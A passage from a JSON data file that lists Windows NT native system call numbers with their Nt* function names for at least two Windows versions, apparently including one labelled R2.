\"NtMapViewOfSection\", \"38\": \"NtAccessCheckAndAuditAlarm\", \"39\": \"NtUnmapViewOfSection\", \"40\": \"NtReplyWaitReceivePortEx\", \"41\": \"NtTerminateProcess\", \"42\": \"NtSetEventBoostPriority\", \"43\": \"NtReadFileScatter\", \"44\": \"NtOpenThreadTokenEx\", \"45\": \"NtOpenProcessTokenEx\", \"46\": \"NtQueryPerformanceCounter\", \"47\": \"NtEnumerateKey\", \"48\": \"NtOpenFile\", \"49\": \"NtDelayExecution\", \"50\": \"NtQueryDirectoryFile\", \"51\": \"NtQuerySystemInformation\", \"52\": \"NtOpenSection\", \"53\": \"NtQueryTimer\", \"54\": \"NtFsControlFile\", \"55\": \"NtWriteVirtualMemory\", \"56\": \"NtCloseObjectAuditAlarm\", \"57\": \"NtDuplicateObject\", \"58\": \"NtQueryAttributesFile\", \"59\": \"NtClearEvent\", \"60\": \"NtReadVirtualMemory\", \"61\": \"NtOpenEvent\", \"62\": \"NtAdjustPrivilegesToken\", \"63\": \"NtDuplicateToken\", \"64\": \"NtContinue\", \"65\": \"NtQueryDefaultUILanguage\", \"66\": \"NtQueueApcThread\", \"67\": \"NtYieldExecution\", \"68\": \"NtAddAtom\", \"69\": \"NtCreateEvent\", \"70\": \"NtQueryVolumeInformationFile\", \"71\": \"NtCreateSection\", \"72\": \"NtFlushBuffersFile\", \"73\": \"NtApphelpCacheControl\", \"74\": \"NtCreateProcessEx\", \"75\": \"NtCreateThread\", \"76\": \"NtIsProcessInJob\", \"77\": \"NtProtectVirtualMemory\", \"78\": \"NtQuerySection\", \"79\": \"NtResumeThread\", \"80\": \"NtTerminateThread\", \"81\": \"NtReadRequestData\", \"82\": \"NtCreateFile\", \"83\": \"NtQueryEvent\", \"84\": \"NtWriteRequestData\", \"85\": \"NtOpenDirectoryObject\", \"86\": \"NtAccessCheckByTypeAndAuditAlarm\", \"87\": \"NtQuerySystemTime\", \"88\": \"NtWaitForMultipleObjects\", \"89\": \"NtSetInformationObject\", \"90\": \"NtCancelIoFile\", \"91\": \"NtTraceEvent\", \"92\": \"NtPowerInformation\", \"93\": \"NtSetValueKey\", \"94\": \"NtCancelTimer\", \"95\": \"NtSetTimer\", \"96\": \"NtAcceptConnectPort\", \"97\": \"NtAccessCheck\", \"98\": \"NtAccessCheckByType\", \"99\": \"NtAccessCheckByTypeResultList\", \"100\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"102\": \"NtAcquireCMFViewOwnership\", \"103\": \"NtAddBootEntry\", \"104\": \"NtAddDriverEntry\", \"105\": \"NtAdjustGroupsToken\", \"106\": \"NtAlertResumeThread\", \"107\": \"NtAlertThread\", \"108\": \"NtAllocateLocallyUniqueId\", \"109\": \"NtAllocateUserPhysicalPages\", \"110\": \"NtAllocateUuids\", \"111\": \"NtAlpcAcceptConnectPort\", \"112\": \"NtAlpcCancelMessage\", \"113\": \"NtAlpcConnectPort\", \"114\": \"NtAlpcCreatePort\", \"115\": \"NtAlpcCreatePortSection\", \"116\": \"NtAlpcCreateResourceReserve\", \"117\": \"NtAlpcCreateSectionView\", \"118\": \"NtAlpcCreateSecurityContext\", \"119\": \"NtAlpcDeletePortSection\", \"120\": \"NtAlpcDeleteResourceReserve\", \"121\": \"NtAlpcDeleteSectionView\", \"122\": \"NtAlpcDeleteSecurityContext\", \"123\": \"NtAlpcDisconnectPort\", \"124\": \"NtAlpcImpersonateClientOfPort\", \"125\": \"NtAlpcOpenSenderProcess\", \"126\": \"NtAlpcOpenSenderThread\", \"127\": \"NtAlpcQueryInformation\", \"128\": \"NtAlpcQueryInformationMessage\", \"129\": \"NtAlpcRevokeSecurityContext\", \"130\": \"NtAlpcSendWaitReceivePort\", \"131\": \"NtAlpcSetInformation\", \"132\": \"NtAreMappedFilesTheSame\", \"133\": \"NtAssignProcessToJobObject\", \"134\": \"NtCancelDeviceWakeupRequest\", \"135\": \"NtCancelIoFileEx\", \"136\": \"NtCancelSynchronousIoFile\", \"137\": \"NtCommitComplete\", \"138\": \"NtCommitEnlistment\", \"139\": \"NtCommitTransaction\", \"140\": \"NtCompactKeys\", \"141\": \"NtCompareTokens\", \"142\": \"NtCompleteConnectPort\", \"143\": \"NtCompressKey\", \"144\": \"NtConnectPort\", \"145\": \"NtCreateDebugObject\", \"146\": \"NtCreateDirectoryObject\", \"147\": \"NtCreateEnlistment\", \"148\": \"NtCreateEventPair\", \"149\": \"NtCreateIoCompletion\", \"150\": \"NtCreateJobObject\", \"151\": \"NtCreateJobSet\", \"152\": \"NtCreateKeyTransacted\", \"153\": \"NtCreateKeyedEvent\", \"154\": \"NtCreateMailslotFile\", \"155\": \"NtCreateMutant\", \"156\": \"NtCreateNamedPipeFile\", \"157\": \"NtCreatePagingFile\", \"158\": \"NtCreatePort\", \"159\": \"NtCreatePrivateNamespace\", \"160\": \"NtCreateProcess\", \"161\": \"NtCreateProfile\", \"162\": \"NtCreateResourceManager\", \"163\": \"NtCreateSemaphore\", \"164\": \"NtCreateSymbolicLinkObject\", \"165\": \"NtCreateThreadEx\", \"166\": \"NtCreateTimer\", \"167\": \"NtCreateToken\", \"168\": \"NtCreateTransaction\", \"169\": \"NtCreateTransactionManager\", \"170\": \"NtCreateUserProcess\", \"171\": \"NtCreateWaitablePort\", \"172\": \"NtCreateWorkerFactory\", \"173\": \"NtDebugActiveProcess\", \"174\": \"NtDebugContinue\", \"175\": \"NtDeleteAtom\", \"176\": \"NtDeleteBootEntry\", \"177\": \"NtDeleteDriverEntry\", \"178\": \"NtDeleteFile\", \"179\": \"NtDeleteKey\", \"180\": \"NtDeleteObjectAuditAlarm\", \"181\": \"NtDeletePrivateNamespace\", \"182\": \"NtDeleteValueKey\", \"183\": \"NtDisplayString\", \"184\": \"NtEnumerateBootEntries\", \"185\": \"NtEnumerateDriverEntries\", \"186\": \"NtEnumerateSystemEnvironmentValuesEx\", \"187\": \"NtEnumerateTransactionObject\", \"188\": \"NtExtendSection\", \"189\": \"NtFilterToken\", \"190\": \"NtFlushInstallUILanguage\", \"191\": \"NtFlushInstructionCache\", \"192\": \"NtFlushKey\", \"193\": \"NtFlushProcessWriteBuffers\", \"194\": \"NtFlushVirtualMemory\", \"195\": \"NtFlushWriteBuffer\", \"196\": \"NtFreeUserPhysicalPages\", \"197\": \"NtFreezeRegistry\", \"198\": \"NtFreezeTransactions\", \"199\": \"NtGetContextThread\", \"200\": \"NtGetCurrentProcessorNumber\", \"201\": \"NtGetDevicePowerState\", \"202\": \"NtGetMUIRegistryInfo\", \"203\": \"NtGetNextProcess\", \"204\": \"NtGetNextThread\", \"205\": \"NtGetNlsSectionPtr\", \"206\": \"NtGetNotificationResourceManager\", \"207\": \"NtGetPlugPlayEvent\", \"208\": \"NtGetWriteWatch\", \"209\": \"NtImpersonateAnonymousToken\", \"210\": \"NtImpersonateThread\", \"211\": \"NtInitializeNlsFiles\", \"212\": \"NtInitializeRegistry\", \"213\": \"NtInitiatePowerAction\", \"214\": \"NtIsSystemResumeAutomatic\", \"215\": \"NtIsUILanguageComitted\", \"216\": \"NtListenPort\", \"217\": \"NtLoadDriver\", \"218\": \"NtLoadKey\", \"219\": \"NtLoadKey2\", \"220\": \"NtLoadKeyEx\", \"221\": \"NtLockFile\", \"222\": \"NtLockProductActivationKeys\", \"223\": \"NtLockRegistryKey\", \"224\": \"NtLockVirtualMemory\", \"225\": \"NtMakePermanentObject\", \"226\": \"NtMakeTemporaryObject\", \"227\": \"NtMapCMFModule\", \"228\": \"NtMapUserPhysicalPages\", \"229\": \"NtModifyBootEntry\", \"230\": \"NtModifyDriverEntry\", \"231\": \"NtNotifyChangeDirectoryFile\", \"232\": \"NtNotifyChangeKey\", \"233\": \"NtNotifyChangeMultipleKeys\", \"234\": \"NtOpenEnlistment\", \"235\": \"NtOpenEventPair\", \"236\": \"NtOpenIoCompletion\", \"237\": \"NtOpenJobObject\", \"238\": \"NtOpenKeyTransacted\", \"239\": \"NtOpenKeyedEvent\", \"240\": \"NtOpenMutant\", \"241\": \"NtOpenObjectAuditAlarm\", \"242\": \"NtOpenPrivateNamespace\", \"243\": \"NtOpenProcessToken\", \"244\": \"NtOpenResourceManager\", \"245\": \"NtOpenSemaphore\", \"246\": \"NtOpenSession\", \"247\": \"NtOpenSymbolicLinkObject\", \"248\": \"NtOpenThread\", \"249\": \"NtOpenTimer\", \"250\": \"NtOpenTransaction\", \"251\": \"NtOpenTransactionManager\", \"252\": \"NtPlugPlayControl\", \"253\": \"NtPrePrepareComplete\", \"254\": \"NtPrePrepareEnlistment\", \"255\": \"NtPrepareComplete\", \"256\": \"NtPrepareEnlistment\", \"257\": \"NtPrivilegeCheck\", \"258\": \"NtPrivilegeObjectAuditAlarm\", \"259\": \"NtPrivilegedServiceAuditAlarm\", \"260\": \"NtPropagationComplete\", \"261\": \"NtPropagationFailed\", \"262\": \"NtPulseEvent\", \"263\": \"NtQueryBootEntryOrder\", \"264\": \"NtQueryBootOptions\", \"265\": \"NtQueryDebugFilterState\", \"266\": \"NtQueryDirectoryObject\", \"267\": \"NtQueryDriverEntryOrder\", \"268\": \"NtQueryEaFile\", \"269\": \"NtQueryFullAttributesFile\", \"270\": \"NtQueryInformationAtom\", \"271\": \"NtQueryInformationEnlistment\", \"272\": \"NtQueryInformationJobObject\", \"273\": \"NtQueryInformationPort\", \"274\": \"NtQueryInformationResourceManager\", \"275\": \"NtQueryInformationTransaction\", \"276\": \"NtQueryInformationTransactionManager\", \"277\": \"NtQueryInformationWorkerFactory\", \"278\": \"NtQueryInstallUILanguage\", \"279\": \"NtQueryIntervalProfile\", \"280\": \"NtQueryIoCompletion\", \"281\": \"NtQueryLicenseValue\", \"282\": \"NtQueryMultipleValueKey\", \"283\": \"NtQueryMutant\", \"284\": \"NtQueryOpenSubKeys\", \"285\": \"NtQueryOpenSubKeysEx\", \"286\": \"NtQueryPortInformationProcess\", \"287\": \"NtQueryQuotaInformationFile\", \"288\": \"NtQuerySecurityObject\", \"289\": \"NtQuerySemaphore\", \"290\": \"NtQuerySymbolicLinkObject\", \"291\": \"NtQuerySystemEnvironmentValue\", \"292\": \"NtQuerySystemEnvironmentValueEx\", \"293\": \"NtQueryTimerResolution\", \"294\": \"NtRaiseException\", \"295\": \"NtRaiseHardError\", \"296\": \"NtReadOnlyEnlistment\", \"297\": \"NtRecoverEnlistment\", \"298\": \"NtRecoverResourceManager\", \"299\": \"NtRecoverTransactionManager\", \"300\": \"NtRegisterProtocolAddressInformation\", \"301\": \"NtRegisterThreadTerminatePort\", \"302\": \"NtReleaseCMFViewOwnership\", \"303\": \"NtReleaseKeyedEvent\", \"304\": \"NtReleaseWorkerFactoryWorker\", \"305\": \"NtRemoveIoCompletionEx\", \"306\": \"NtRemoveProcessDebug\", \"307\": \"NtRenameKey\", \"308\": \"NtRenameTransactionManager\", \"309\": \"NtReplaceKey\", \"310\": \"NtReplacePartitionUnit\", \"311\": \"NtReplyWaitReplyPort\", \"312\": \"NtRequestDeviceWakeup\", \"313\": \"NtRequestPort\", \"314\": \"NtRequestWakeupLatency\", \"315\": \"NtResetEvent\", \"316\": \"NtResetWriteWatch\", \"317\": \"NtRestoreKey\", \"318\": \"NtResumeProcess\", \"319\": \"NtRollbackComplete\", \"320\": \"NtRollbackEnlistment\", \"321\": \"NtRollbackTransaction\", \"322\": \"NtRollforwardTransactionManager\", \"323\": \"NtSaveKey\", \"324\": \"NtSaveKeyEx\", \"325\": \"NtSaveMergedKeys\", \"326\": \"NtSecureConnectPort\", \"327\": \"NtSetBootEntryOrder\", \"328\": \"NtSetBootOptions\", \"329\": \"NtSetContextThread\", \"330\": \"NtSetDebugFilterState\", \"331\": \"NtSetDefaultHardErrorPort\", \"332\": \"NtSetDefaultLocale\", \"333\": \"NtSetDefaultUILanguage\", \"334\": \"NtSetDriverEntryOrder\", \"335\": \"NtSetEaFile\", \"336\": \"NtSetHighEventPair\", \"337\": \"NtSetHighWaitLowEventPair\", \"338\": \"NtSetInformationDebugObject\", \"339\": \"NtSetInformationEnlistment\", \"340\": \"NtSetInformationJobObject\", \"341\": \"NtSetInformationKey\", \"342\": \"NtSetInformationResourceManager\", \"343\": \"NtSetInformationToken\", \"344\": \"NtSetInformationTransaction\", \"345\": \"NtSetInformationTransactionManager\", \"346\": \"NtSetInformationWorkerFactory\", \"347\": \"NtSetIntervalProfile\", \"348\": \"NtSetIoCompletion\", \"349\": \"NtSetLdtEntries\", \"350\": \"NtSetLowEventPair\", \"351\": \"NtSetLowWaitHighEventPair\", \"352\": \"NtSetQuotaInformationFile\", \"353\": \"NtSetSecurityObject\", \"354\": \"NtSetSystemEnvironmentValue\", \"355\": \"NtSetSystemEnvironmentValueEx\", \"356\": \"NtSetSystemInformation\", \"357\": \"NtSetSystemPowerState\", \"358\": \"NtSetSystemTime\", \"359\": \"NtSetThreadExecutionState\", \"360\": \"NtSetTimerResolution\", \"361\": \"NtSetUuidSeed\", \"362\": \"NtSetVolumeInformationFile\", \"363\": \"NtShutdownSystem\", \"364\": \"NtShutdownWorkerFactory\", \"365\": \"NtSignalAndWaitForSingleObject\", \"366\": \"NtSinglePhaseReject\", \"367\": \"NtStartProfile\", \"368\": \"NtStopProfile\", \"369\": \"NtSuspendProcess\", \"370\": \"NtSuspendThread\", \"371\": \"NtSystemDebugControl\", \"372\": \"NtTerminateJobObject\", \"373\": \"NtTestAlert\", \"374\": \"NtThawRegistry\", \"375\": \"NtThawTransactions\", \"376\": \"NtTraceControl\", \"377\": \"NtTranslateFilePath\", \"378\": \"NtUnloadDriver\", \"379\": \"NtUnloadKey\", \"380\": \"NtUnloadKey2\", \"381\": \"NtUnloadKeyEx\", \"382\": \"NtUnlockFile\", \"383\": \"NtUnlockVirtualMemory\", \"384\": \"NtVdmControl\", \"385\": \"NtWaitForDebugEvent\", \"386\": \"NtWaitForKeyedEvent\", \"387\": \"NtWaitForWorkViaWorkerFactory\", \"388\": \"NtWaitHighEventPair\", \"389\": \"NtWaitLowEventPair\", \"390\": \"NtWorkerFactoryWorkerReady\"}, \"R2\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\": \"NtReadFile\", \"4\": \"NtDeviceIoControlFile\", \"5\": \"NtWriteFile\", \"6\": \"NtRemoveIoCompletion\", \"7\": \"NtReleaseSemaphore\", \"8\": \"NtReplyWaitReceivePort\", \"9\": \"NtReplyPort\", \"10\": \"NtSetInformationThread\", \"11\": \"NtSetEvent\", \"12\": \"NtClose\", \"13\": \"NtQueryObject\", \"14\": \"NtQueryInformationFile\", \"15\": \"NtOpenKey\", \"16\": \"NtEnumerateValueKey\", \"17\": \"NtFindAtom\", \"18\": \"NtQueryDefaultLocale\", \"19\": \"NtQueryKey\", \"20\": \"NtQueryValueKey\", \"21\": \"NtAllocateVirtualMemory\", \"22\": \"NtQueryInformationProcess\", \"23\": \"NtWaitForMultipleObjects32\", \"24\": \"NtWriteFileGather\", \"25\": \"NtSetInformationProcess\", \"26\": \"NtCreateKey\", \"27\": \"NtFreeVirtualMemory\", \"28\": \"NtImpersonateClientOfPort\", \"29\": \"NtReleaseMutant\", \"30\": \"NtQueryInformationToken\", \"31\": \"NtRequestWaitReplyPort\", \"32\": \"NtQueryVirtualMemory\", \"33\": \"NtOpenThreadToken\", \"34\": \"NtQueryInformationThread\", \"35\": \"NtOpenProcess\", \"36\": \"NtSetInformationFile\", \"37\": \"NtMapViewOfSection\", \"38\": \"NtAccessCheckAndAuditAlarm\", \"39\": \"NtUnmapViewOfSection\", \"40\": \"NtReplyWaitReceivePortEx\", \"41\": \"NtTerminateProcess\", \"42\": \"NtSetEventBoostPriority\", \"43\": \"NtReadFileScatter\", \"44\": \"NtOpenThreadTokenEx\", \"45\": \"NtOpenProcessTokenEx\", \"46\": \"NtQueryPerformanceCounter\", \"47\": \"NtEnumerateKey\", \"48\": \"NtOpenFile\", \"49\": \"NtDelayExecution\", \"50\": \"NtQueryDirectoryFile\", \"51\": \"NtQuerySystemInformation\", \"52\": \"NtOpenSection\", \"53\": \"NtQueryTimer\", \"54\": \"NtFsControlFile\", \"55\": \"NtWriteVirtualMemory\", \"56\": \"NtCloseObjectAuditAlarm\", \"57\": \"NtDuplicateObject\", \"58\": \"NtQueryAttributesFile\", \"59\": \"NtClearEvent\", \"60\": \"NtReadVirtualMemory\", \"61\": \"NtOpenEvent\", \"62\": \"NtAdjustPrivilegesToken\", \"63\": \"NtDuplicateToken\", \"64\": \"NtContinue\", \"65\": \"NtQueryDefaultUILanguage\", \"66\": \"NtQueueApcThread\", \"67\": \"NtYieldExecution\", \"68\": \"NtAddAtom\", \"69\": \"NtCreateEvent\", \"70\": \"NtQueryVolumeInformationFile\", \"71\": \"NtCreateSection\", \"72\": \"NtFlushBuffersFile\", \"73\": \"NtApphelpCacheControl\", \"74\": \"NtCreateProcessEx\", \"75\": \"NtCreateThread\", \"76\": \"NtIsProcessInJob\", \"77\": \"NtProtectVirtualMemory\", \"78\": \"NtQuerySection\", \"79\": \"NtResumeThread\", \"80\": \"NtTerminateThread\", \"81\": \"NtReadRequestData\", \"82\": \"NtCreateFile\", \"83\": \"NtQueryEvent\", \"84\": \"NtWriteRequestData\", \"85\": \"NtOpenDirectoryObject\", \"86\": \"NtAccessCheckByTypeAndAuditAlarm\", \"87\": \"NtQuerySystemTime\", \"88\": \"NtWaitForMultipleObjects\", \"89\": \"NtSetInformationObject\", \"90\": \"NtCancelIoFile\", \"91\": \"NtTraceEvent\", \"92\": \"NtPowerInformation\", \"93\": \"NtSetValueKey\", \"94\": \"NtCancelTimer\", \"95\": \"NtSetTimer\", \"96\": \"NtAcceptConnectPort\", \"97\": \"NtAccessCheck\", \"98\": \"NtAccessCheckByType\", \"99\": \"NtAccessCheckByTypeResultList\", \"100\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"102\": \"NtAddBootEntry\", \"103\": \"NtAddDriverEntry\", \"104\": \"NtAdjustGroupsToken\", \"105\": \"NtAlertResumeThread\", \"106\": \"NtAlertThread\", \"107\": \"NtAllocateLocallyUniqueId\", \"108\": \"NtAllocateReserveObject\", \"109\": \"NtAllocateUserPhysicalPages\", \"110\": \"NtAllocateUuids\", \"111\": \"NtAlpcAcceptConnectPort\", \"112\": \"NtAlpcCancelMessage\", \"113\": \"NtAlpcConnectPort\", \"114\": \"NtAlpcCreatePort\", \"115\": \"NtAlpcCreatePortSection\", \"116\": \"NtAlpcCreateResourceReserve\", \"117\": \"NtAlpcCreateSectionView\", \"118\": \"NtAlpcCreateSecurityContext\", \"119\": \"NtAlpcDeletePortSection\", \"120\": \"NtAlpcDeleteResourceReserve\", \"121\": \"NtAlpcDeleteSectionView\", \"122\": \"NtAlpcDeleteSecurityContext\", \"123\": \"NtAlpcDisconnectPort\", \"124\": \"NtAlpcImpersonateClientOfPort\", \"125\": \"NtAlpcOpenSenderProcess\", \"126\": \"NtAlpcOpenSenderThread\", \"127\": \"NtAlpcQueryInformation\", \"128\": \"NtAlpcQueryInformationMessage\", \"129\": \"NtAlpcRevokeSecurityContext\", \"130\": \"NtAlpcSendWaitReceivePort\", \"131\": \"NtAlpcSetInformation\", \"132\": \"NtAreMappedFilesTheSame\", \"133\": \"NtAssignProcessToJobObject\", \"134\": \"NtCancelIoFileEx\", \"135\": \"NtCancelSynchronousIoFile\", \"136\": \"NtCommitComplete\", \"137\": \"NtCommitEnlistment\", \"138\": \"NtCommitTransaction\", \"139\": \"NtCompactKeys\", \"140\": \"NtCompareTokens\", \"141\": \"NtCompleteConnectPort\", \"142\": \"NtCompressKey\", \"143\": \"NtConnectPort\", \"144\": \"NtCreateDebugObject\", \"145\": \"NtCreateDirectoryObject\", \"146\": \"NtCreateEnlistment\", \"147\": \"NtCreateEventPair\", \"148\": \"NtCreateIoCompletion\", \"149\": \"NtCreateJobObject\", \"150\": \"NtCreateJobSet\", \"151\": \"NtCreateKeyTransacted\", \"152\": \"NtCreateKeyedEvent\", \"153\": \"NtCreateMailslotFile\", \"154\": \"NtCreateMutant\", \"155\": \"NtCreateNamedPipeFile\", \"156\": \"NtCreatePagingFile\", \"157\": \"NtCreatePort\", \"158\": \"NtCreatePrivateNamespace\", \"159\": \"NtCreateProcess\", \"160\": \"NtCreateProfile\", \"161\": \"NtCreateProfileEx\", \"162\": \"NtCreateResourceManager\", \"163\": \"NtCreateSemaphore\", \"164\": \"NtCreateSymbolicLinkObject\", \"165\": \"NtCreateThreadEx\", \"166\": \"NtCreateTimer\", \"167\": \"NtCreateToken\", \"168\": \"NtCreateTransaction\", \"169\": \"NtCreateTransactionManager\", \"170\": \"NtCreateUserProcess\", \"171\": \"NtCreateWaitablePort\", \"172\": \"NtCreateWorkerFactory\", \"173\": \"NtDebugActiveProcess\", \"174\": \"NtDebugContinue\", \"175\": \"NtDeleteAtom\", \"176\": \"NtDeleteBootEntry\", \"177\": \"NtDeleteDriverEntry\", \"178\": \"NtDeleteFile\", \"179\": \"NtDeleteKey\", \"180\": \"NtDeleteObjectAuditAlarm\", \"181\": \"NtDeletePrivateNamespace\", \"182\": \"NtDeleteValueKey\", \"183\": \"NtDisableLastKnownGood\", \"184\": \"NtDisplayString\", \"185\": \"NtDrawText\", \"186\": \"NtEnableLastKnownGood\", \"187\": \"NtEnumerateBootEntries\", \"188\": \"NtEnumerateDriverEntries\", \"189\": \"NtEnumerateSystemEnvironmentValuesEx\", \"190\": \"NtEnumerateTransactionObject\", \"191\": \"NtExtendSection\", \"192\": \"NtFilterToken\", \"193\": \"NtFlushInstallUILanguage\", \"194\": \"NtFlushInstructionCache\", \"195\": \"NtFlushKey\", \"196\": \"NtFlushProcessWriteBuffers\", \"197\": \"NtFlushVirtualMemory\", \"198\": \"NtFlushWriteBuffer\", \"199\": \"NtFreeUserPhysicalPages\", \"200\": \"NtFreezeRegistry\", \"201\": \"NtFreezeTransactions\", \"202\": \"NtGetContextThread\", \"203\": \"NtGetCurrentProcessorNumber\", \"204\": \"NtGetDevicePowerState\", \"205\": \"NtGetMUIRegistryInfo\", \"206\": \"NtGetNextProcess\", \"207\": \"NtGetNextThread\", \"208\": \"NtGetNlsSectionPtr\", \"209\": \"NtGetNotificationResourceManager\", \"210\": \"NtGetPlugPlayEvent\", \"211\": \"NtGetWriteWatch\", \"212\": \"NtImpersonateAnonymousToken\", \"213\": \"NtImpersonateThread\", \"214\": \"NtInitializeNlsFiles\", \"215\": \"NtInitializeRegistry\", \"216\": \"NtInitiatePowerAction\", \"217\": \"NtIsSystemResumeAutomatic\", \"218\": \"NtIsUILanguageComitted\", \"219\": \"NtListenPort\", \"220\": \"NtLoadDriver\", \"221\": \"NtLoadKey\", \"222\": \"NtLoadKey2\", \"223\": \"NtLoadKeyEx\", \"224\": \"NtLockFile\", \"225\": \"NtLockProductActivationKeys\", \"226\": \"NtLockRegistryKey\", \"227\": \"NtLockVirtualMemory\", \"228\": \"NtMakePermanentObject\", \"229\": \"NtMakeTemporaryObject\", \"230\": \"NtMapCMFModule\", \"231\": \"NtMapUserPhysicalPages\", \"232\": \"NtModifyBootEntry\", \"233\": \"NtModifyDriverEntry\", \"234\": \"NtNotifyChangeDirectoryFile\", \"235\": \"NtNotifyChangeKey\", \"236\": \"NtNotifyChangeMultipleKeys\", \"237\": \"NtNotifyChangeSession\", \"238\": \"NtOpenEnlistment\", \"239\": \"NtOpenEventPair\", \"240\": \"NtOpenIoCompletion\", \"241\": \"NtOpenJobObject\", \"242\": \"NtOpenKeyEx\", \"243\": \"NtOpenKeyTransacted\", \"244\": \"NtOpenKeyTransactedEx\", \"245\": \"NtOpenKeyedEvent\", \"246\": \"NtOpenMutant\", \"247\": \"NtOpenObjectAuditAlarm\", \"248\": \"NtOpenPrivateNamespace\", \"249\": \"NtOpenProcessToken\", \"250\": \"NtOpenResourceManager\", \"251\": \"NtOpenSemaphore\", \"252\": \"NtOpenSession\", \"253\": \"NtOpenSymbolicLinkObject\", \"254\": \"NtOpenThread\", \"255\": \"NtOpenTimer\", \"256\": \"NtOpenTransaction\", \"257\": \"NtOpenTransactionManager\", \"258\": \"NtPlugPlayControl\", \"259\": \"NtPrePrepareComplete\", \"260\": \"NtPrePrepareEnlistment\", \"261\": \"NtPrepareComplete\", \"262\": \"NtPrepareEnlistment\", \"263\": \"NtPrivilegeCheck\", \"264\": \"NtPrivilegeObjectAuditAlarm\", \"265\": \"NtPrivilegedServiceAuditAlarm\", \"266\": \"NtPropagationComplete\", \"267\": \"NtPropagationFailed\", \"268\": \"NtPulseEvent\", \"269\": \"NtQueryBootEntryOrder\", \"270\": \"NtQueryBootOptions\", \"271\": \"NtQueryDebugFilterState\", \"272\": \"NtQueryDirectoryObject\", \"273\": \"NtQueryDriverEntryOrder\", \"274\": \"NtQueryEaFile\", \"275\": \"NtQueryFullAttributesFile\", \"276\": \"NtQueryInformationAtom\", \"277\": \"NtQueryInformationEnlistment\", \"278\": \"NtQueryInformationJobObject\", \"279\": \"NtQueryInformationPort\", \"280\": \"NtQueryInformationResourceManager\", \"281\": \"NtQueryInformationTransaction\", \"282\": \"NtQueryInformationTransactionManager\", \"283\": \"NtQueryInformationWorkerFactory\", \"284\": \"NtQueryInstallUILanguage\", \"285\": \"NtQueryIntervalProfile\", \"286\": \"NtQueryIoCompletion\", \"287\": \"NtQueryLicenseValue\", \"288\": \"NtQueryMultipleValueKey\", \"289\": \"NtQueryMutant\", \"290\": \"NtQueryOpenSubKeys\", \"291\": \"NtQueryOpenSubKeysEx\", \"292\": \"NtQueryPortInformationProcess\", \"293\": \"NtQueryQuotaInformationFile\", \"294\": \"NtQuerySecurityAttributesToken\", \"295\": \"NtQuerySecurityObject\", \"296\": \"NtQuerySemaphore\", \"297\": \"NtQuerySymbolicLinkObject\", \"298\": \"NtQuerySystemEnvironmentValue\", \"299\": \"NtQuerySystemEnvironmentValueEx\", \"300\": \"NtQuerySystemInformationEx\", \"301\": \"NtQueryTimerResolution\", \"302\": \"NtQueueApcThreadEx\", \"303\": \"NtRaiseException\", \"304\": \"NtRaiseHardError\", \"305\": \"NtReadOnlyEnlistment\", \"306\": \"NtRecoverEnlistment\", \"307\": \"NtRecoverResourceManager\", \"308\": \"NtRecoverTransactionManager\", \"309\": \"NtRegisterProtocolAddressInformation\", \"310\": \"NtRegisterThreadTerminatePort\", \"311\": \"NtReleaseKeyedEvent\", \"312\": \"NtReleaseWorkerFactoryWorker\", \"313\": \"NtRemoveIoCompletionEx\", \"314\": \"NtRemoveProcessDebug\", \"315\": \"NtRenameKey\", \"316\": \"NtRenameTransactionManager\", \"317\": \"NtReplaceKey\", \"318\": \"NtReplacePartitionUnit\", \"319\": \"NtReplyWaitReplyPort\", \"320\": \"NtRequestPort\", \"321\": \"NtResetEvent\", \"322\": \"NtResetWriteWatch\", \"323\": \"NtRestoreKey\", \"324\": \"NtResumeProcess\", \"325\": \"NtRollbackComplete\", \"326\": \"NtRollbackEnlistment\", \"327\": \"NtRollbackTransaction\", \"328\": \"NtRollforwardTransactionManager\", \"329\": \"NtSaveKey\", \"330\": \"NtSaveKeyEx\", \"331\": \"NtSaveMergedKeys\", \"332\": \"NtSecureConnectPort\", \"333\": \"NtSerializeBoot\", \"334\": \"NtSetBootEntryOrder\", \"335\": \"NtSetBootOptions\", \"336\": \"NtSetContextThread\", \"337\": \"NtSetDebugFilterState\", \"338\": \"NtSetDefaultHardErrorPort\", \"339\": \"NtSetDefaultLocale\", \"340\": \"NtSetDefaultUILanguage\", \"341\": \"NtSetDriverEntryOrder\", \"342\": \"NtSetEaFile\", \"343\": \"NtSetHighEventPair\", \"344\": \"NtSetHighWaitLowEventPair\", \"345\": \"NtSetInformationDebugObject\", \"346\": \"NtSetInformationEnlistment\", \"347\": \"NtSetInformationJobObject\", \"348\": \"NtSetInformationKey\", \"349\": \"NtSetInformationResourceManager\", \"350\": \"NtSetInformationToken\", \"351\": \"NtSetInformationTransaction\", \"352\": \"NtSetInformationTransactionManager\", \"353\": \"NtSetInformationWorkerFactory\", \"354\": \"NtSetIntervalProfile\", \"355\": \"NtSetIoCompletion\", \"356\": \"NtSetIoCompletionEx\", \"357\": \"NtSetLdtEntries\", \"358\": \"NtSetLowEventPair\", \"359\": \"NtSetLowWaitHighEventPair\", \"360\": \"NtSetQuotaInformationFile\", \"361\": \"NtSetSecurityObject\", \"362\": \"NtSetSystemEnvironmentValue\", \"363\": \"NtSetSystemEnvironmentValueEx\", \"364\": \"NtSetSystemInformation\", \"365\": \"NtSetSystemPowerState\", \"366\": \"NtSetSystemTime\", \"367\": \"NtSetThreadExecutionState\", \"368\": \"NtSetTimerEx\", \"369\": \"NtSetTimerResolution\", \"370\": \"NtSetUuidSeed\", \"371\": \"NtSetVolumeInformationFile\", \"372\": \"NtShutdownSystem\", \"373\": \"NtShutdownWorkerFactory\", \"374\": \"NtSignalAndWaitForSingleObject\", \"375\": \"NtSinglePhaseReject\", \"376\": \"NtStartProfile\", \"377\": \"NtStopProfile\", \"378\": \"NtSuspendProcess\", \"379\": \"NtSuspendThread\", \"380\": \"NtSystemDebugControl\", \"381\": \"NtTerminateJobObject\", \"382\": \"NtTestAlert\", \"383\": \"NtThawRegistry\", \"384\": \"NtThawTransactions\", \"385\": \"NtTraceControl\", \"386\": \"NtTranslateFilePath\", \"387\": \"NtUmsThreadYield\", \"388\": \"NtUnloadDriver\", \"389\": \"NtUnloadKey\", \"390\": \"NtUnloadKey2\", \"391\": \"NtUnloadKeyEx\", \"392\": \"NtUnlockFile\", \"393\": \"NtUnlockVirtualMemory\", \"394\": \"NtVdmControl\", 